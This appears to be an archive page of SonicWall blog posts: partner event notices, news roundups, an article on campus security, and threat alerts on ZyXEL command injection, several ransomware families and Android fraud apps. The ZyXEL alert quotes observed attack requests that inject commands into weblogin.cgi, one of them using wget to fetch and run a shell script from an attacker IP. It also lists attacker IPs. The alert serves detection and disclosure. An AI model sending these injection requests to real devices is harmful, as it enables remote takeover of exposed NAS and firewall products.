SonicWall EMEA 2020 Virtual Partner Events

/0 Comments/in /by

We are excited to announce a series of Virtual 2020 Partner Events, starting in July –  for members of our SecureFirst partner community and those interested in learning more about our SecureFirst partner program.

During these two- to four-hour events, you’ll have the opportunity to hear from SonicWall experts in your region as we share with you how SonicWall is uniquely positioned to help businesses and organizations everywhere mobilize for the new business normal.

We’ll cover a range of subjects from the newest SonicWall products, including SonicWall Switches and SD-Branch capabilities, all the way through to the most topical issues such as securing remote and mobile workforces. We’ll also be taking a look at how the SecureFirst Partner Program can be best utilized by our Partners to ensure their continued growth and success.

Our great lineup will ensure you leave this event feeling that your business is empowered and that your partnership with SonicWall is stronger than ever in these unprecedented times.

Book your virtual seat today!

Register now

If you are interested in attending an upcoming Partner Roadshow event in Europe or Africa, please reference the table below and register for a city near you.

DateLocationRegistration Link
July 2France (French)Register
July 3DACH (German)Register
July 7Middle East, Africa & Turkey (English)Register
July 7Romania (Romanian)Register
July 7Spain (Spanish)Register
July 8Italy (Italian)Register
July 8UK & Nordics (English)Register
July 9Portugal (English)Register
July 9Benelux (English)Register

Please note availability is limited and this event is targeted to the SonicWall Partner community.

More partner news

Keep up with partner news from SonicWall by following us on social media and by following our dedicated partner-focused Twitter account: @SNWLSecChannel

COVID-19 Ushers in a New Era of Cybersecurity

/0 Comments/in /by

As colleges and universities approach the fall semester, COVID-19 has complicated cybersecurity measures.

This semester, higher-ed institutions around the world have struggled to keep up with the digital demands of remote learning. As these organizations build the infrastructure that will support distance learning moving forward, it’s more critical than ever for the education industry to consider the safety and security of its students and faculty members as we look ahead to how COVID-19 will continue to impact learning institutions.

College campuses have long been a target for cyber threat actors. In fact, EDUCAUSE reported that the number-one IT issue academic institutions face in 2020 is adopting a sound information security strategy. It’s no wonder, considering the rise in faculty and students bringing their own devices (BYOD) over the past decade, coupled with universities’ often insufficient funds to adequately secure campus networks.

And the amount of sensitive data that needs to be safeguarded has risen in lockstep with the number of devices. Academic institutions are a treasure trove of data — from student health and financial data, to faculty resumes and 401(k) information, to critical research and organizational data used to support U.S. companies and government agencies.

Now, in the age of COVID-19, all of this information is even more vulnerable as students and faculty access it via remote, at-home networks that often lag behind on-campus facilities in terms of security.

Academic institutions are aware that remote learning is likely here to stay for the foreseeable future, with campuses across the U.S. deciding to keep students home through the summer and even the fall semesters. With that expectation on the horizon, schools need to start making important decisions now about how to reinforce their IT security for the months ahead — especially when you consider the impact education has on communities, from job security for faculty and staff to talent development for the next generation of innovators.

Beyond the crisis, academic institutions must also consider how COVID-19 has forever changed the classroom environment. Once schools have made the necessary investments to bolster their IT and security infrastructure to support off-campus learning, is a 100% return to campus even viable?

Here are a few key strategies to help higher-ed institutions understand their critical cybersecurity infrastructure and protect remote learners and teachers from today’s greatest cyber threats, both now and going forward.

Remote learning’s biggest threats

As students and teachers across the U.S. wrap up the school year from home, academic institutions need to think critically about their biggest cybersecurity challenges, especially as summer classes approach and conversations about continuing remote learning into next fall ensue.

Emails, PDFs and Office documents, for example, are the most common threat vectors used by cybercriminals — and students can fall victim to social engineering, phishing attacks, ransomware and email fraud without the right protections in place. Similarly, as students receive instruction and emails from their schools and professors (and even the online learning platforms they use to complete assignments), they are not necessarily on high alert to keep an eye out for phishing scams. Data breaches are another serious risk, as students and professors increasingly use personal devices on remote networks.

At this time, it’s critical for academic institutions to understand the implications of a weak cybersecurity infrastructure and take critical steps to protect at-home users and endpoint devices. They must take it upon themselves to enhance cyber awareness throughout their organization and practice good cyber hygiene. This is not only important for protecting students’ sensitive data, but also for ensuring business continuity — particularly for higher education institutions where ongoing faculty communications, adviser roles and critical research must continue in between semesters.

Consider the cloud

Ironically, the sudden jump to remote learning coincides with the ongoing cloud business transformation. For higher-ed institutions — especially those with tighter IT budgets — the benefits of moving to the cloud are extensive, including cost savings, ubiquitous security coverage on and off campus, greater agility, maximum uptime and easy deployment.

This is especially critical for the storing and sharing of critical information developed by university researchers for business and government use. While universities must open up lab data and resources for students and faculty to continue their important research at home, it’s difficult to ensure that this information — previously reinforced by physical buildings and on-prem solutions —doesn’t fall into the hands of threat actors or nation-states.

With that, protecting students and faculty is central to defending these core resources. Academic institutions should consider deploying cloud-based security services to protect their entire organization from advanced email threats (regardless of location) and secure sensitive student and employee data by enforcing multifactor authentication, strong encryption, data protection and compliance policies.

Additionally, as schools plan to keep their doors closed for the summer and potentially fall semesters, they are naturally thinking about moving additional resources to the cloud. Given that students and faculty are prone to using Google and other file-sharing services that are typically not covered by network security infrastructure, academic institutions should consider deploying Cloud Access Security Brokers (CASBs) as an added layer of protection for sensitive information stored in and shared via the cloud.

Ensure strong endpoints

Finally, academic institutions should consider deploying endpoint protection capabilities to secure devices that connect and interact with school applications and data. Endpoint protection platforms are critical for protecting endpoint devices against malware and enabling continuous behavioral monitoring.

Because remote learning has required academic institutions to leverage productivity and collaboration applications like Slack and Zoom, school IT departments need real-time visibility of these applications and any vulnerabilities found on them in order to halt potential threats. This will enable school IT administrators to prioritize what applications to patch, and even enable blacklisting of processes that are launched by unauthorized applications — e.g., if students or professors seek tools or platforms that are not managed by the school. Visibility and control of applications is crucial, because threat actors will always be looking for vulnerable versions of applications running on user endpoints.

These are just a few strategies academic institutions and online learning platforms should consider as they look ahead to the next phases of the COVID-19 response and, potentially, continued remote learning. Reinforcing the cybersecurity infrastructure needs to be the number-one priority if these institutions want to maintain the trust and security of students and faculty long after the crisis is eradicated.

This blog originally appeared on the eCampus News website and is reposted with permission.

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

/in /by

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication by using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the below hits more often as attackers scan for the vulnerable devices. In the username parameter, it sends the command “ls,” a vulnerable device will return without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the below Http GET request which attempts to download a shell script to the “tmp” directory, execute the shell script “test.sh”, and later remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on shodan shows few hundreds of the affected ZyXEL NAS devices exposed online.

 

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates available for NAS products that reached end-of-support, users are advised not to leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Find vendor advisory here

IOC:

Attacker IP’s:

62.171.171.24
108.41.185.191
95.55.151.170
110.29.165.15
83.228.1.77
213.59.131.51
201.21.226.33
222.138.203.0
77.76.182.174
103.123.150.66
182.180.173.249
194.143.248.230
128.90.164.48
103.234.226.145
75.145.190.44
94.227.15.86
108.7.223.135
169.1.233.212
114.129.28.252
89.211.220.169
37.191.233.81
187.143.247.123
116.196.65.202
47.101.136.228
93.114.113.103
154.126.79.223
187.182.168.14
14.234.48.139
92.70.17.98
177.81.219.19
91.227.50.230
122.230.145.99
95.76.102.94
77.52.185.59
67.165.140.191
187.120.194.22
82.222.168.10
94.225.181.234
124.123.127.69
61.239.185.168
190.139.6.182
213.164.215.33
103.240.77.52
124.109.50.214
122.117.143.35
114.220.117.147
109.130.153.176
83.23.126.120
93.40.11.165
213.153.153.219
103.133.122.6
203.40.91.116
186.158.175.131
69.254.107.46
2.26.219.16
177.41.37.241
73.185.241.75
200.117.244.223
220.184.203.94
41.188.62.215
177.39.102.151

 

 

 

 

Cybersecurity News & Trends – 06-26-20

/0 Comments/in /by

Hackers made inroads this week with zero-day threats, massive DDoS attacks and point-of-sale compromises — but there were significant wins for the good guys, too.

SonicWall Spotlight

CEO Outlook 2020 – Bill Conner — CRN

  • CRN recently asked 80 of the industry’s top CEOs — including SonicWall’s Bill Conner — why 2020 will be the launch of the data decade.

MSPs will be forced to fix ‘rushed out’ remote working solutions post-COVID – Sonicwall CEO —  Channel Partner Insight

  • In an interview with CPI, Bill Conner explained that as changes to work patterns are likely to outlast the pandemic, pivoting out of lockdown will mean some of the earlier “temporary” remote working solutions will need to be re-engineered.

The Tel Aviv Tech Startups that are Solving COVID-19 Challenges — Forbes

  • Tel Aviv-based Perimeter 81, a provider of network security-as-a-service that recently completed a $10 million Series A led by SonicWall and existing investors, offers solutions that replace traditional VPNs.

Cybersecurity News

FBI warns K-12 schools of ransomware attacks via RDP —  ZDNet

  • The FBI has issued a security alert warning K-12 schools about ransomware gangs abusing RDP connections to break into school systems.

There are DDoS attacks, then there’s this 809 million packet-per-second tsunami Akamai says it just caught —  The Register

  • The attack, which targeted an unspecified European bank, was the largest such attack Akamai had ever encountered — and CDN believes it may be the largest DDoS attack to hit any network, ever.

This ransomware has learned a new trick: Scanning for point of sales
devices —  ZDNet

  • Already one of the most dangerous forms of ransomware, Sodinokibi now looks like it could be attempting to make money from stolen payment information, too.

FBI sees major spike in coronavirus-related cyber threats — The Hill

  • FBI’s Internet Crime Complaint Center (IC3) has received 20,000 coronavirus-related cyber threat reports this year — as many as they received in all of 2019.

Republicans propose bill to end ‘warrant-proof’ encryption
The Washington Times

  • Republicans on the Senate Judiciary Committee introduced a bill Tuesday taking on the encryption technology that major tech companies use to secure customer data.

New WastedLocker ransomware demands payments of millions of USD —  ZDNet

  • Evil Corp, one of the biggest malware operations on the planet, has returned to life with a new ransomware strain.

Ransomware operators lurk on your network after their attack —  Bleeping Computer

  • While many believe attackers quickly deploy ransomware and leave so they won’t get caught, in reality threat actors are not so quick to give up a resource that they worked so hard to control.

Phishing and cryptocurrency scams squashed as one million emails are reported to new anti-scam hotline —  ZDNet

  • In the two months since its launch, the UK’s new anti-scam hotline has received an average of 16,500 emails per day, resulting in 10,000 links to online scams either blocked or taken down by authorities.

Hacker arrested for stealing, selling PII of 65K hospital employees
Bleeping Computer

  • 29-year-old Justin Sean Johnson has been arrested for allegedly stealing PII and W-2 information for over 65,000 University of Pittsburgh Medical Center employees and selling it on the dark web.

Security surprise: Four zero-days spotted in attacks on researchers’ fake networks —  ZDNet

  • Previously unknown attacks used against fake systems highlight big problems with industrial systems security.

In Case You Missed It

Cobralocker ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild.

The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <Cobra>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Cobra] extension onto each encrypted file’s filename.

During our analysis, we have noticed the malware using the following Key to encrypt your files. (See source code below).

This makes our jobs easier to create a Decryptor tool for COBRALOCKER.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signature:

  • GAV: COBRALOCKER.RSM (Trojan)

A Brief History of COVID-19 Related Attacks, Pt. 1

/0 Comments/in , /by

As the world manages voluntary quarantines, mandated isolations, social distancing and “shelter-at-home” edicts, cybercriminals are busy creating malware and other cyberattacks that prey on the fear surrounding the novel coronavirus epidemic (COVID-19).

“More than ever, the public needs to be hyper-aware of the interactions they have online, particularly involving the links and emails they open,” SonicWall Vice President Terry Greer-King told The Sun. “Cybercriminals do their utmost to take advantage of trying times by tricking users into opening dangerous files, through what they consider to be trusted sources.”

While SonicWall Capture Labs threat researchers are constantly investigating and analyzing all threats, the team has flagged the top cyberattacks that leverage coronavirus and COVID-19 to take advantage of human behavior. Here are some of the earliest:

Malicious Archive File: February 5, 2020

In early February, SonicWall Capture Labs used patent-pending Real-Time Deep Memory Inspection (RTDMI) to detect an archive file containing an executable file named CoronaVirus_Safety_Measures.exe. The archive is delivered to the victim’s machine as an email attachment.

After analyzing the executable file, SonicWall found that the file belongs to the GOZ InfoStealer family, which was first detected by SonicWall RTDMI in November 2019.

The GOZ InfoStealer is known for stealing user data from installed applications, along with victims’ system information, which is then sent to the threat actor over Simple Mail Transfer Protocol (SMTP).

The malware author is continuously updating the malware code and changing its infection chain. Details of this analysis are available in this SonicAlert: “Threat Actors Are Misusing Coronavirus Scare To Spread Malicious Executable.”

Coronavirus-Themed Android RAT: February 26, 2020

SonicWall Capture Labs observed a coronavirus scare tactic being used in the Android ecosystem in the form of a Remote Access Trojan (RAT), which is an Android apk that simply goes by the name coronavirus.

After installation and execution, this sample requests that the victim re-enter the pin/pattern on the device and steals it while repeatedly requesting ‘accessibility service’ capabilities.

Upon viewing the code structure (below), it becomes apparent that some form of packing/encoding is being used in this sample. The class names appear random, but have a structure in themselves; most class names are of similar length and equally random.

On inspecting the Manifest.xml files, most of the activities listed are unavailable in the decompiled code. This indicates that the ‘real’ class files will be decrypted during runtime. This is a mechanism that makes it difficult for automated tools to analyze the code and give a verdict.

Details of this analysis are available in this SonicAlert: “Coronavirus-themed Android RAT on the Prowl.”

SonicWall Capture Labs provides protection against these threats with the following signatures:

  • AndroidOS.Spyware.RT (Trojan)
  • AndroidOS.Spyware.DE (Trojan)

COVID-19 Hoax Scareware: March 13, 2020

SonicWall Capture Labs threat researchers observed a malware taking advantage of the coronavirus (COVID-19) fears, also known as ‘scareware.’ The sample pretends to be a ransomware by displaying a ransom note (shown below). In reality, however, it does not encrypt any files.

To scare the victim, a number of security warning messages are displayed:

In the end, the malware is benign and hopes fear and human behavior will force victims into paying the ransom. Details of this analysis are available in this SonicAlert: “COVID-19 Hoax Scareware.”

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Scareware.CoVid_A (Trojan)

Malicious “Marketing Campaign” Propagates Android RAT: March 14, 2020

SonicWall Capture Labs threat researchers discovered and analyzed malicious campaign websites that currently serve (at the time of publication) Android Remote Access Trojan (RAT) belonging to the same family discovered in February 2020 (see below).

Cyberattackers are creating websites that spread misinformation about coronavirus (COVID-19), falsely claiming ways to “get rid of” the novel virus. Instead, the sites attract new victims via download links.

SonicWall found two main variants of this strategy, one in English and another in Turkish. Both serve the apk named corona.apk when the victim clicks on Google Play image.

Upon downloading the apk file and examining the code, SonicWall found a similar structure to the variant outlined in February. This sample is an Android Remote Access Trojan (RAT) and can perform a number of malicious operations, including:

  • Get information about the device
  • Get a list of apps installed
  • Allow remote control of the device via TeamViewer
  • Steal Gmail password and/or lock pattern
  • Keylogger
  • Upload files
  • Steal SMS messages, contacts
  • Disable Play Protect

There is a lot of misinformation and panic surrounding coronavirus (COVID-19). SonicWall Capture Labs reiterates that there are no mobile apps that can track coronavirus infections or point to a vaccine. Please exercise extreme caution.

Details of this analysis are available in this SonicAlert: “Misinformation Related to Coronavirus Being Used to Propagate Malicious Android RAT.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Spyware.RT (Trojan)
  • Spyware.DE (Trojan)

12-Layer Azorult.Rk: March 16, 2020

SonicWall Capture Labs threat researchers found a new sample and activity for the “coronavirus” binary Azorult.Rk. Malware authors have taken advantage of the public’s desire for information on the COVID-19 pandemic since it was first discovered in December 2019 — and it has only escalated since.

Azorult.Rk masquerades as an application providing diagnosis support, even including a screenshot of a popular interactive tool that maps COVID-19 cases and exposure. It includes 12 different layers of static and dynamic information, making it difficult for threat analysts to quickly investigate. This specific analysis serves as a strong primer on how malware authors mask their motives and tactics.

After sorting through the layers, SonicWall found the malware eventually attempted to transmit statistics and metrics of the physical machine hardware, as well usernames, hostnames and much more.

Details of this analysis are available in this SonicAlert: “Coronavirus, COVID-19 & Azorult.Rk.”

SonicWall Capture Labs provides protection against this threat with the following signature:

  • GAV: Azorult.RK

Coronavirus Ransomware: March 19, 2020

SonicWall Capture Labs threat researchers have observed a new ransomware threat leveraging coronavirus fear. This ransomware encrypts and zips the files and renames it ‘coronaVi2022@protonmail.ch__<filename>’. It then changes the drive name to coronavirus and drops coronavirus.txt in each and every folder of the infected system.

After modifying registration keys, it adds new keys and shows users the following ransom message:

After 20 minutes, it restarts the victim machine and displays yet another ransom note.

Additional details of this analysis are available in this SonicAlert: “Coronavirus Ransomware.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: CoronaVirus.RSM_2
  • GAV : CoronaVirus.RSM

Work-from-Home VPN Solutions for Remote Workforces

To help organizations cost-effectively implement VPN technology for their rapidly expanding work-from-home employees, SonicWall is making its remote access products and services available to both new and existing customers at deeply discounted rates. We’re also bundling critical security solutions for new enterprise and SMB customers.

This special offer provides free Secure Mobile Access (SMA) virtual appliances sized for enterprises and SMBs, and also includes 50% discounts on Cloud App Security and Capture Client endpoint protection when paired with SMA.

These packages were bundled to include everything needed to protect employees outside the network:

Fraudsters victimizing innocent users through a dubious Android finance app

/in /by

CoViD19 pandemic has created a global crisis, and threat actors have worsened the situation by unleashing their malicious handiwork.

SonicWall capture labs threats research team has been blogging regularly about the malware threats leveraging the current CoViD19 pandemic. SonicWall has found another Android app using this theme. The app until some time was distributed via Google Play Store, it has been removed from the Play Store after we reported this to the concerned team.

The app named Cashbox is categorized as a Finance app. It targets Indian Android Phone consumers and is portrayed as an app that would assist customers to get a loan. The high number of installs indicates a large number of users may have been victimized:

 

The fraudulent app seems to have passed unnoticed by security solutions, as illustrated by the fact that the app isn’t detected by AV vendors on the popular threat intelligence sharing portal VirusTotal:

 

The app promises to help provide easy loans to customers. Description of the app contains Loan EMI and interest details as shown below:

 

Post installation, it showed a list of permissions required. Interestingly, the app prompts the user to grant permissions by describing why those permissions are required:

 

The user must provide the loan amount first; eventually, it asks for PAN (Permanent Account Number) Card, and self-photo clicked using the phone camera to be uploaded:

 

Thereafter, the user is informed that authentication is completed and the user’s name, along with PAN Card number and Date of Birth are displayed to look genuine, which reduces suspicion:

 

Next, it asks the user to make a payment of Rs. 99 through any of the four options Card, UPI, Wallets, or Net Banking as shown below:

 

Then, other loan facilitating apps are recommended:

    Recommended apps

 

All the personal information is requested again if the user decides to use any of the recommended apps. The users are first promised easy loans but in return their personal information is stolen and a new loan app is recommended.

Reviews shared by some of the users of the fraudulent app reflect their frustration:

 

The below code snippet indicates the app fetched user’s location and device information as well:

 

SonicWall Capture Labs provides protection against this threat with the following signature :

Android_FraudApp.A (Trojan)

 

Indicators Of Compromise (IOC’s):

1ab6fe4483a77ccffe9876d5426822a57037d6a890382666442342b2704464bb

SonicWall’s Online Community Connects Cybersecurity Professionals

/0 Comments/in /by

SonicWall recently launched an online community to connect like-minded professionals from around the world. Since the launch, there have been nearly a thousand users who have interacted with one another, each contributing and helping through their own unique technical expertise, personal knowledge and experience.

But what is a community? Gartner defines a community as “a constantly changing group of people collaborating and sharing their ideas over an electronic network.” By bringing together a group of people with a common interest, providing a platform for addressing many readers at once, and facilitating communication in real time, Gartner says, communities are able to optimize their collective power.

We’ve seen this definition come to life with the launch of SonicWall Community—and the benefits are already becoming clear:

  • Exchanging best practices for lowering total cost of ownership through SonicWall solutions.
  • Learning how to maximize the value of SonicWall products.
  • Connecting with product management and support to ask questions, get help or submit an idea.
  • Sharing your experience and expertise with other SonicWall users.

A Truly Engaging Community

At its core, the community enables cybersecurity professionals to connect with one another in relevant and meaningful ways. The community is a place to ask questions, start new discussions, and collaborate with experts from across a variety of industries.

Customers and partners with questions have received relevant and helpful responses by both SonicWall staff and experienced professionals in the field. Members have come together to solve difficult problems. Through collective brainstorming and creativity, issues that may have taken a few days are now solved in half the time.

The community is easy to use and features a variety of ways to find meaningful content. Take advantage of the built-in search to find relevant posts, view the latest discussions, or select from a wide variety of solution categories.

And with the real-time notification option, it’s easy to know when one of your questions has received a response. You can also choose to stay up to date on product notifications, user mentions, issues found in the wild, and more

The community even has a developer hub for in-depth technical discussions, as well as a virtual “water cooler” to take a break to swap ideas and connect with peers.

The best part about joining the community is that it gives you free, 24/7 access to a wealth of knowledge — and getting started is easy. Simply navigate to community.sonicwall.com and sign in with your existing MySonicWall credentials to start participating. If you don’t have a MySonicWall account, that’s OK. It’s free to create one and takes just a few minutes to sign up.

Join SonicWall Community

Whether you’re just getting started with SonicWall products or you’ve been with us for years, the SonicWall community has something to offer. And if you choose to share your own unique knowledge and experience, you have the potential to help countless others.

Come join the conversation now at community.sonicwall.com.
 

Join Now

Cybersecurity News & Trends – 06-19-20

/0 Comments/in /by

This week, SonicWall’s new Switches and Secure SD-Branch made waves, hackers made a stronger Qbot, and attacks on AWS made history.

SonicWall Spotlight

ChannelPro 5 Minute Roundup — ChannelPro Network

  • Erick and Rich of ChannelPro explore the far-reaching implications of SonicWall’s new branch office networking solution, which they say arrived at a great time for businesses.

SonicWall Launches New Network Switches — Enterprise Times

  • SonicWall has announced a range of new products, including new multi-gigabit switches and an SD-Branch solution.

SonicWall Advances Network Edge Security, Adds Multi-gigabit Switch Series and New SD-Branch Capabilities — TMCnet

  • TMCnet highlights SonicWall’s momentum over the past quarter, including the release of new and enhanced MSSP offerings and the launch of its SD-Branch capabilities.

SonicWall takes threat protection to the branch level — MicroScope

  • This article covers the  latest SD-Branch offering as a major shift and a milestone in its corporate history, with it set to have a major impact on the security player’s channel.

Cybersecurity News

Researchers Expose a New Vulnerability in Intel’s CPUs — Wired

  • Modern CPUs — particularly those made by Intel — have been under siege in recent years by an unending series of attacks. Now, two separate academic teams disclosed two new and distinctive exploits that pierce Intel’s Software Guard eXtension, by far the most sensitive region of the company’s processors.

Google Sees Increase in COVID-19 Phishing in Brazil, India, UK — Security Week

  • Cyberthreats taking advantage of the COVID-19 pandemic are evolving, and Google is seeing an increase in related phishing attempts in some countries.

Attackers impersonate secure messaging site to steal bitcoins — Bleeping Computer

  • In what can be described as the case of both cybersquatting and phishing, threat actors have created a site that imitates the legitimate secure note sharing service privnote.com to steal bitcoins.

Coder-Turned-Kingpin Paul Le Roux Gets His Comeuppance — Wired

  • Paul Le Roux, 47 — who faced up to a life sentence after pleading guilty to crimes ranging from methamphetamine trafficking to selling weapons technology to Iran — has been sentenced to 25 years in federal prison.

Targeting U.S. banks, Qbot trojan evolves with new evasion techniques — SC Magazine 

  • By malware standards, the banking trojan Qbot is long in the tooth, but it still has some bite, according to researchers who say it has added some detection and research evasion techniques to its arsenal.

Hackers Trigger Far-Reaching Disruption by Targeting Low-Profile Firm — The Wall Street Journal

  • Small and midsize companies are fighting a rising tide of cyberattacks largely out of public view, posing an underappreciated risk for the bigger companies and institutions that use their services.

Google Alerts catches fake data breach notes pushing malware — Bleeping Computer

  • Fraudsters have begun pushing fake data breach notifications using big company names to distribute malware and scams. They’re mixing black SEO, Google Sites, and spam pages to direct users to dangerous locations.

Exclusive: Massive spying on users of Google’s Chrome shows new security weakness — Bloomberg

  • A newly discovered spyware effort attacked users through 32 million downloads of extensions to Google’s Chrome web browser, highlighting the tech industry’s failure to protect browsers despite their increasing use for email, payroll and other sensitive functions.

AWS said it mitigated a 2.3 Tbps DDoS attack, the largest ever — ZDNet

  • The previous record for the largest DDoS attack ever recorded was of 1.7 Tbps, recorded in March 2018.

In Case You Missed It

Fake ransomware decryptor spreads Zorab ransomware

/in /by

Sonicwall Capture Labs threat research team observed  Zorab ransomware posing as DJVU ransomware decryptor .

When a user’s computer files are encrypted by a ransomware,he desperately looks for tool to decrypt files instead of paying ransom. One such decyptor called DecryptorDjvuMlagham.exe instead of removing the DJVU ransomware infection, it spreads Zorab ransomware.

Infection cycle

Upon clicking the application it launches a console and asks for relevant information.

But it accepts any input and does not validate it.

Once you click Start Scan instead of scanning it extracts another executable called crab[.]exe at users\AppData\Local\Temp

Dissembling the code one can see that on the button click crab.exe is extracted.

This executable then starts encrypting files. The encrypted files have extension .ZRB
It also encrypts the already encrypted files and changes the extension to .ZRB
 

The attacker keeps a ransom note in each folder called -DECRYPT~ZORAB.txt

The ransomware note reads the following and boasts that this is just a business and they don’t care about the victim. They also demand to write an email to zorab28@protonmail.com for information about how to decrypt files.

At the time of writing this alert we had not yet received a response to the email that we sent to the attacker.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Zorab.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.